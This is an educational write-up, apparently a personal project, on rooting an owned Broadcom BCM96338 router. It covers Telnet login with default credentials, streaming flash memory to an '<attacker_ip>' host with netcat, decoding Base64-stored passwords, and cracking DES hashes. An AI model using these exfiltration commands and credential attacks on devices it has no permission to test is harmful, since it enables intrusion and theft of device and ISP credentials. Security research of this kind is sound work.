This project documents the end-to-end reverse engineering process of a Broadcom BCM96338 based embedded device. The goal was to audit the device's security, understand its proprietary file system, and retrieve hidden credentials using both static and live analysis techniques.
⚠️ Disclaimer: This project is strictly for educational purposes and was performed on hardware I own. Sensitive details (MAC addresses, Public IPs) have been sanitized.
- Target: Pikatel / AirTies (Broadcom BCM96338 Chipset)
- OS: Embedded Linux (Kernel 2.6.8) with BusyBox v1.00
- Techniques: Network Reconnaissance, Firmware Exfiltration, Blind Stream, Hash Cracking.
- Tools:
nmap,netcat,binwalk,dd,strings,John the Ripper.
I started by scanning the device to identify attack vectors. Nmap revealed that alongside the web interface (Port 80), the device had Telnet (Port 23) exposed, which is a critical security risk for legacy devices.
Figure 1: Service enumeration revealing open Telnet and FTP ports.
Using default credentials found in public documentation (admin:password), I gained shell access via Telnet. Once inside, I enumerated the system architecture to plan the firmware extraction.
- Architecture: MIPS (Big Endian)
- CPU: BCM6338 V1.0
- Constraints: Read-Only file system, limited RAM.
Figure 2: Gaining shell access via Telnet.
Figure 3: Verifying the Kernel version and CPU architecture.
Before attempting extraction, I checked the memory layout (/proc/mtd) to identify the correct flash storage block. I confirmed that mtd0 was the "Physically mapped flash" containing the complete firmware image.
Figure 4: Identifying mtd0 as the target flash storage block.
To analyze the firmware offline, I needed to dump the Flash memory (/dev/mtdblock0). However, the environment was extremely restricted. Standard tools like wget were broken or stripped down, making it impossible to download external tools to the router.
Figure 5: Attempting to fetch binaries failed due to the restricted environment.
Since I couldn't download files to the router, I decided to stream the data out using Netcat, which was luckily present in the firmware.
- Listener (Kali Linux):
nc -l -p 23 > firmware_dump.bin - Sender (Router):
cat /dev/mtdblock0 | nc <attacker_ip> 23
Figure 6: Successfully dumping the 2.5MB firmware image over the TCP socket.
I attempted to extract the dumped firmware using binwalk and 7z. I successfully stripped the proprietary header using dd, but the SquashFS extraction failed.
Technical Root Cause: The router uses Big Endian MIPS architecture. Standard extraction tools on modern x86/x64 systems (Little Endian) cannot natively read the file system structure without cross-compilation or specialized tools (like sasquatch-mipseb).
Figure 7: The extraction failure that forced a switch to Live Analysis.
Since static extraction was blocked by architecture mismatch, I pivoted to Live Analysis. I navigated the file system through the Telnet shell and located the configuration backup file.
I discovered that sensitive credentials (ISP PPPoE password, Support credentials) were stored in an XML file, merely encoded with Base64 rather than being encrypted.
Figure 8: Locating the Base64 encoded passwords in the config file.
Decoded Credentials:
cGFzc3dvcmQ=-> password (Admin)c3VwcG9ydA==-> support (Hidden Service Account)
Beyond the XML file, I extracted the system user hashes from /etc/passwd. Using John the Ripper, I identified the algorithm as legacy DES (crypt3) and successfully cracked the root-level hashes.
Figure 9: Cracking the system hashes in seconds due to weak algorithm usage.
Finally, I attempted to write a backdoor file to the system to test for persistence. The operation failed, confirming that the root file system is mounted as Read-Only (SquashFS). Persistence is only possible by rebuilding the entire firmware image and flashing it back to the MTD block.
Figure 10: Verifying the immutable nature of the firmware.
This project demonstrated the vulnerabilities present in legacy embedded devices:
- Weak Storage: Passwords stored in Base64 or weak DES hashes.
- Insecure Defaults: Telnet exposed by default.
- Architecture: While the Big Endian architecture prevented simple static analysis, it did not stop live data exfiltration.
Status: Device Rooted & Fully Analyzed. 🚀